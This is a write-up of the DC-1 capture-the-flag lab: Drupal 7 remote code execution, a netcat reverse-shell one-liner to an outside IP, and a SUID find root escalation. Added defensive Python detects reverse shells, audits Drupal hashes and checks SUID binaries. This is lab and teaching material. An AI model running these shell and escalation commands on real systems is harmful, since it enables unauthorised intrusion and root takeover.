DC-1

22/tcp  open  ssh     OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
| ssh-hostkey: 
|   1024 c4:d6:59:e6:77:4c:22:7a:96:16:60:67:8b:42:48:8f (DSA)
|   2048 11:82:fe:53:4e:dc:5b:32:7f:44:64:82:75:7d:d0:a0 (RSA)
|_  256 3d:aa:98:5c:87:af:ea:84:b8:23:68:8d:b9:05:5f:d8 (ECDSA)
80/tcp  open  http    Apache httpd 2.2.22 ((Debian))
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
|_/LICENSE.txt /MAINTAINERS.txt
|_http-title: Welcome to Drupal Site | Drupal Site
|_http-generator: Drupal 7 (http://drupal.org)
|_http-server-header: Apache/2.2.22 (Debian)
111/tcp open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          37701/tcp   status
|   100024  1          39759/udp6  status
|   100024  1          45295/tcp6  status
|_  100024  1          55275/udp   status
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Running nikto reveals that it's running Drupal 7 (nmap's http-generator line already said the same).

This means that it's most likely vulnerable to a known remote code execution (RCE) flaw.

The script tries to execute the "id" command by default, and running it shows the command executed successfully. Now we have RCE.

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.49.164 4545 >/tmp/f

The reverse shell command worked. (Make sure to wrap the command in double quotes when passing it to the script; otherwise your local shell interprets the pipes and you'll receive a reverse shell from your own machine.)
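From the defender's side, the one-liner above has a recognisable shape: a named pipe, an interactive shell and a network tool chained in a single command line. The following detector is an added example (not part of the DC-1 writeup) that flags that shape in process command lines such as auditd EXECVE records or a ps snapshot. The tool and shell name sets and the sample command lines are constructed assumptions.

```python
"""Flag process command lines that look like a FIFO/netcat reverse shell."""
import re
import shlex
from dataclasses import dataclass
from typing import List, Optional

# Assumed lists: tools that can carry a shell over the network, and shells.
NET_TOOLS = {"nc", "ncat", "netcat", "socat"}
SHELLS = {"sh", "bash", "dash", "zsh", "ksh"}
IPV4 = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")


@dataclass
class Finding:
    cmdline: str
    reasons: List[str]
    remote: Optional[str]  # "ip:port" when it could be recovered from the command


def _basename(token: str) -> str:
    return token.rsplit("/", 1)[-1]


def _segments(cmdline: str) -> List[str]:
    """Split a shell one-liner into simple commands on |, ||, && and ;."""
    return [s.strip() for s in re.split(r"\|\|?|&&|;", cmdline) if s.strip()]


def analyze_cmdline(cmdline: str) -> Optional[Finding]:
    has_fifo = has_shell = has_net = has_devtcp = False
    remote = None
    for seg in _segments(cmdline):
        try:
            argv = shlex.split(seg)
        except ValueError:  # unbalanced quotes: fall back to whitespace split
            argv = seg.split()
        if not argv:
            continue
        prog = _basename(argv[0])
        if prog == "mkfifo":
            has_fifo = True
        elif prog in SHELLS and "-i" in argv[1:]:
            has_shell = True
        elif prog in NET_TOOLS:
            has_net = True
            ip = next((a for a in argv[1:] if IPV4.match(a)), None)
            port = next((a for a in argv[1:] if a.isdigit()), None)
            if ip and port:
                remote = f"{ip}:{port}"
        if "/dev/tcp/" in seg or "/dev/udp/" in seg:
            has_devtcp = True
    reasons = []
    if has_shell and has_net:
        reasons.append("interactive shell piped into a network tool")
    if has_fifo and has_net:
        reasons.append("named pipe created in the same command as a network tool")
    if has_devtcp:
        reasons.append("bash /dev/tcp or /dev/udp redirection")
    return Finding(cmdline, reasons, remote) if reasons else None


def scan(cmdlines) -> List[Finding]:
    return [f for f in (analyze_cmdline(c) for c in cmdlines) if f]


# Constructed sample: the writeup's command plus benign lines that share tokens with it.
SAMPLE_CMDLINES = [
    "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.49.164 4545 >/tmp/f",
    "nc -zv 10.0.0.5 22",                                       # plain port check
    "mkfifo /tmp/pipe; tar cf - /data | gzip > /tmp/backup.tgz",  # FIFO, no network
    "cat /var/log/syslog | grep -i error",
    "/bin/bash -i",                                             # local interactive shell
]

if __name__ == "__main__":
    for f in scan(SAMPLE_CMDLINES):
        print(f"ALERT remote={f.remote} reasons={f.reasons}\n  {f.cmdline}")
```

Only the writeup's command is reported; the port check, the FIFO used for a backup and the local interactive shell each carry one of the tokens but not the combination, which is what keeps the rule from paging on routine admin work.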

Priv Esc

R0ck3t

$S$DAK00p3Dkojkf4O/UizYxenguXnjv
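The value above has the layout of a Drupal 7 password hash: a "$S$" prefix, one character encoding the log2 iteration count, an 8-character salt and the encoded SHA-512 digest, 55 characters in total. The parser below is an added example (not from the writeup or from Drupal) that a site owner can run over the users table to report the cost factor and flag legacy MD5 entries, below-default costs and truncated or corrupted values; the hash shown on this page is only 32 characters long, so it is reported as truncated. The sample hashes other than the page's own are constructed.

```python
"""Audit Drupal 7 password hashes for cost, algorithm and integrity."""
from dataclasses import dataclass
from typing import List, Tuple

# phpass alphabet used for the iteration-count character and the encoded digest.
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
# Drupal 7 constants from password.inc.
DRUPAL_HASH_LENGTH = 55      # full "$S$" hash length
DRUPAL_HASH_COUNT = 15       # default log2 iterations (2^15)
DRUPAL_MIN_HASH_COUNT = 7
DRUPAL_MAX_HASH_COUNT = 30
PHPASS_MD5_LENGTH = 34       # "$P$"/"$H$" portable phpass hashes


@dataclass
class HashInfo:
    algorithm: str
    log2_iterations: int
    iterations: int
    salt: str
    legacy_md5: bool
    truncated: bool
    issues: List[str]


def parse_drupal_hash(stored: str) -> HashInfo:
    h = stored
    legacy = h.startswith("U$")   # Drupal 6 MD5 hash re-wrapped during migration
    if legacy:
        h = h[1:]
    if h.startswith("$S$"):
        algo, expected_len = "sha512", DRUPAL_HASH_LENGTH
    elif h.startswith(("$P$", "$H$")):
        algo, expected_len = "md5 (phpass)", PHPASS_MD5_LENGTH
    else:
        raise ValueError("not a Drupal 7 / phpass hash")
    if len(h) < 12:
        raise ValueError("too short to contain a cost character and salt")
    log2 = ITOA64.find(h[3])
    if log2 < 0:
        raise ValueError("invalid iteration-count character")
    salt = h[4:12]
    issues = []
    if not DRUPAL_MIN_HASH_COUNT <= log2 <= DRUPAL_MAX_HASH_COUNT:
        issues.append(f"log2 cost {log2} outside Drupal's accepted range")
    elif log2 < DRUPAL_HASH_COUNT:
        issues.append(f"cost 2^{log2} is below Drupal 7's default 2^{DRUPAL_HASH_COUNT}")
    if legacy:
        issues.append("legacy MD5 hash wrapped with 'U' (Drupal 6 migration)")
    if algo != "sha512":
        issues.append("portable phpass MD5 hash rather than Drupal's SHA-512")
    truncated = len(h) != expected_len
    if truncated:
        issues.append(f"length {len(h)}, expected {expected_len}: truncated or corrupted")
    return HashInfo(algo, log2, 2 ** log2, salt, legacy, truncated, issues)


def audit_hashes(rows) -> List[Tuple[str, List[str]]]:
    """Return (name, issues) for every row whose hash has at least one issue."""
    out = []
    for name, stored in rows:
        try:
            issues = parse_drupal_hash(stored).issues
        except ValueError as e:
            issues = [str(e)]
        if issues:
            out.append((name, issues))
    return out


# Constructed sample rows; the first hash is the (display-truncated) value from the writeup.
FULL_OK = "$S$D" + "abcdefgh" + "0123456789012345678901234567890123456789012"
LOW_COST = "$S$5" + "abcdefgh" + "0123456789012345678901234567890123456789012"
LEGACY = "U" + FULL_OK
SAMPLE_ROWS = [
    ("writeup-hash", "$S$DAK00p3Dkojkf4O/UizYxenguXnjv"),
    ("ok-user", FULL_OK),
    ("low-cost-user", LOW_COST),
    ("migrated-user", LEGACY),
    ("broken-user", "5f4dcc3b5aa765d61d8327deb882cf99"),  # raw MD5, not a Drupal 7 hash
]

if __name__ == "__main__":
    for name, issues in audit_hashes(SAMPLE_ROWS):
        print(name, "->", "; ".join(issues))
```

For the page's hash the cost character "D" decodes to log2 15, i.e. Drupal 7's default 32768 SHA-512 rounds, and the salt is "AK00p3Dk"; the only finding is the length mismatch. On a real site, rows reported as legacy or low-cost are the ones to rehash or force through a password reset.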

SUID binary: find was found with the SUID bit set.

Ran the command from GTFOBins and we are root!! https://gtfobins.github.io/gtfobins/find/

find . -exec "/bin/bash" -p \;
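The root of this escalation is a SUID bit on a binary that never needed one. A periodic audit that lists SUID files and compares them against an expected baseline catches that before an attacker does. The script below is an added example (not from the writeup): the baseline set, the short list of binaries known to hand back a shell (find is the one this page uses; GTFOBins, linked above, documents the rest) and the sample file entries are constructed assumptions, and the baseline should be replaced with the package-owned SUID set of the distribution in use.

```python
"""Audit SUID binaries against an expected baseline and flag risky ones."""
import os
import stat
from dataclasses import dataclass
from typing import Iterable, List, Tuple

# Assumed baseline: SUID-root binaries a stock Debian install is expected to carry.
EXPECTED_SUID = {
    "/bin/su", "/bin/mount", "/bin/umount", "/bin/ping",
    "/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/chsh", "/usr/bin/chfn",
    "/usr/bin/newgrp", "/usr/bin/gpasswd",
}
# Illustrative subset of binaries that keep SUID privileges across a shell/command spawn.
SHELL_CAPABLE = {"find", "vim", "nmap", "python", "perl", "bash"}


@dataclass
class SuidFinding:
    path: str
    severity: str
    reason: str


def audit(entries: Iterable[Tuple[str, int, int]]) -> List[SuidFinding]:
    """entries: (path, st_mode, st_uid) triples, e.g. from collect_suid()."""
    findings = []
    for path, mode, uid in entries:
        if not (stat.S_ISREG(mode) and mode & stat.S_ISUID):
            continue  # not a regular file, or not SUID at all
        if path in EXPECTED_SUID:
            continue  # part of the accepted baseline
        name = os.path.basename(path)
        if uid != 0:
            findings.append(SuidFinding(path, "low", f"SUID to uid {uid}, not in baseline"))
        elif name in SHELL_CAPABLE:
            findings.append(SuidFinding(path, "high", "SUID root and can spawn a shell or run commands"))
        else:
            findings.append(SuidFinding(path, "medium", "SUID root binary not in baseline"))
    return findings


def collect_suid(root: str = "/") -> List[Tuple[str, int, int]]:
    """Walk the real filesystem and return SUID regular files (unreadable paths are skipped)."""
    out = []
    for dirpath, dirnames, filenames in os.walk(root, onerror=lambda e: None):
        # Stay on the local filesystem's ordinary directories.
        dirnames[:] = [d for d in dirnames if os.path.join(dirpath, d) not in ("/proc", "/sys", "/dev")]
        for fn in filenames:
            p = os.path.join(dirpath, fn)
            try:
                st = os.lstat(p)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                out.append((p, st.st_mode, st.st_uid))
    return out


# Constructed sample entries; 0o104755 is a regular file with rwsr-xr-x.
SAMPLE_ENTRIES = [
    ("/usr/bin/passwd", 0o104755, 0),         # expected
    ("/usr/bin/find", 0o104755, 0),           # the DC-1 misconfiguration
    ("/usr/local/bin/backup", 0o104755, 0),   # custom SUID-root helper, not in baseline
    ("/usr/bin/ls", 0o100755, 0),             # no SUID bit
    ("/opt/app/agent", 0o104755, 1000),       # SUID to an unprivileged user
]

if __name__ == "__main__":
    for f in audit(SAMPLE_ENTRIES):
        print(f"[{f.severity}] {f.path}: {f.reason}  (fix: chmod u-s {f.path})")
```

Running audit(collect_suid()) on a live host gives the same report for the real filesystem; the remediation for find on DC-1 is simply removing the bit with chmod u-s, since nothing on a Debian system needs find to run as root.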
